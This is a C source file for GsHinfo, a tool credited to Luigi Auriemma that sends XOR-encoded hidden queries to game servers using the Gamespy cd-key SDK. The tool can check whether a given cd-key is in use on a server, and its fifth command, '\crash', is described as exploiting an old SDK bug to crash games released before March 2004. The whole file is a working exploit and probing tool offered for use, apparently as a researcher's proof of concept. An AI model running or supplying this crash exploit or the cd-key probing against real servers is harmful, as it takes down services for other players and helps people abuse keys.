/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "md5.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1.2"
#define BUFFSZ  4096
#define TIMEOUT 3



void gamespyxor(u_char *string, int len);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



u_char *command[] = {
    "\\uok\\\\cd\\%s\\skey\\%d\\errmsg\\Valid CD Key",
    "\\unok\\\\cd\\%s\\skey\\%d\\errmsg\\Invalid CD Key",
    "\\ison\\skey\\%d\\cd\\%s",
    "\\ucount\\",
    "\\crash"
};

/*
other commands, but sent to the master server:
  \disc\\pid\%d\cd\%s\ip\%d
  \auth\\pid\%d\ch\%s\resp\%s\ip\%d\skey\%d

errmsg can be what you want as also "CD Key in use"
*/



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    md5_context md5t;
    int         sd,
                len,
                x,
                i,
                comm;
    u_short     port;
    u_char      *buff,
                keyhash[33],
                md5h[16];
    const char  *hex = "0123456789abcdef";

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "GsHinfo "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 5) {
        printf("\n"
            "Usage: %s <server> <port> <command_num> <cd-key>\n"
            "\n"
            "Command number:\n"
            "1 = uok:    says to the server that the cd-key is valid (can't work because\n"
            "            it is a reply from the master server not a query, so is ignored)\n"
            "2 = unok:   says to the server that the cd-key is not valid (as above)\n"
            "3 = ison:   used to know if a specific cd-key is used in the server\n"
            "4 = ucount: to know the number of people in the server that use a valid cd-key\n"
            "5 = crash:  exploits an old bug in the Gamespy cd-key SDK affecting the games\n"
            "            or the versions released before March 2004\n"
            "\n"
            " you can use a cd-key or directly its MD5 hash (32 chars).\n"
            " If you want to easily know if your game uses the Gamespy cd-key SDK try:\n"
            "\n"
            "   gshinfo 127.0.0.1 PORT 4 0   (where PORT is the query port of your game)\n"
            "\n", argv[0]);
        exit(1);
    }

    srand(time(NULL));      // randomization, used only for skey

    x = sizeof(command) / sizeof(u_char *);
    comm = atoi(argv[3]) - 1;
    if((comm < 0) || (comm >= x)) {
        printf("\nError: you can choose max %d commands\n", x);
        exit(1);
    }

    len = strlen(argv[4]);
    if(len != 32) {
        md5_starts(&md5t);
        md5_update(&md5t, argv[4], len);
        md5_finish(&md5t, md5h);
        for(i = x = 0; i < 16; i++) {
            keyhash[x++] = hex[md5h[i] >> 4];
            keyhash[x++] = hex[md5h[i] & 0xf];
        }
        keyhash[x] = 0;
        printf(
            "- cd-key            %s\n"
            "- cd-key MD5 hash   %s\n",
            argv[4], keyhash);
    } else {
        strcpy(keyhash, argv[4]);
        printf("- cd-key MD5 hash   %s\n",
            keyhash);
    }

    port                 = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(comm <= 1) {
        len = sprintf(buff, command[comm], keyhash, rand());
    } else if(comm == 2) {
        len = sprintf(buff, command[comm], rand(), keyhash);
    } else {
        len = strlen(command[comm]);
        memcpy(buff, command[comm], len + 1);
    }

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- send:\n\n  %s\n\n", buff);
    gamespyxor(buff, len);
    if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    if(comm > 1) {  // uok and unok don't need recvfrom()
        fputs("- wait reply\n", stdout);
        if(timeout(sd) < 0) {
            fputs("- socket timeout, no reply received from the server\n\n", stdout);
            close(sd);
            return(0);
        }

        len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
        if(len < 0) std_err();
        buff[len] = 0;

        if(*buff == ';') {
            fputs("- hidden reply received:\n", stdout);
            gamespyxor(buff, len);
        } else {
            fputs("- server doesn't support hidden queries. The following is the reply:\n", stdout);
        }
        printf("\n%s\n\n", buff);
    }

    close(sd);
    return(0);
}



void gamespyxor(u_char *string, int len) {
    u_char  gamespy[] = "gamespy",
            *gs;
    for(gs = gamespy; len; len--, gs++, string++) {
        if(!*gs) gs = gamespy;
        *string ^= *gs;
    }
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



